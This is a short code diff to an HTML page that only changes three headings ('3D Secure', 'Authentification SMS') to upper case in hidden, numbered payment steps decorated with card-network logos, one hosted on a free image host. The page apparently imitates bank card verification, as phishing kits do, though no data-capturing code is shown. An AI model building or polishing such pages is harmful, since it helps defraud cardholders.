--- a/index.html
+++ b/index.html
@@ -203,7 +203,7 @@
   </div>
 
   <div class="payment-container full-width-container hidden" id="step-2">
-    <h2>3D Secure</h2>
+    <h2>3D SECURE</h2>
     <div class="icon-container">
       <img src="https://i.ibb.co/nkyQTHm/t-l-c.jpg" alt="CB">
       <img src="https://upload.wikimedia.org/wikipedia/commons/0/04/Visa.svg" alt="Visa">
@@ -214,7 +214,7 @@
   </div>
 
   <div class="payment-container full-width-container hidden" id="step-3">
-    <h2>Authentification SMS</h2>
+    <h2>AUTHENTIFICATION SMS</h2>
     <div class="icon-container">
       <img src="https://i.ibb.co/nkyQTHm/t-l-c.jpg" alt="CB">
       <img src="https://upload.wikimedia.org/wikipedia/commons/0/04/Visa.svg" alt="Visa">
@@ -228,7 +228,7 @@
   </div>
 
   <div class="payment-container full-width-container hidden" id="step-4">
-    <h2>3D Secure</h2>
+    <h2>3D SECURE</h2>
     <div class="icon-container">
       <img src="https://i.ibb.co/nkyQTHm/t-l-c.jpg" alt="CB">
       <img src="https://upload.wikimedia.org/wikipedia/commons/0/04/Visa.svg" alt="Visa">
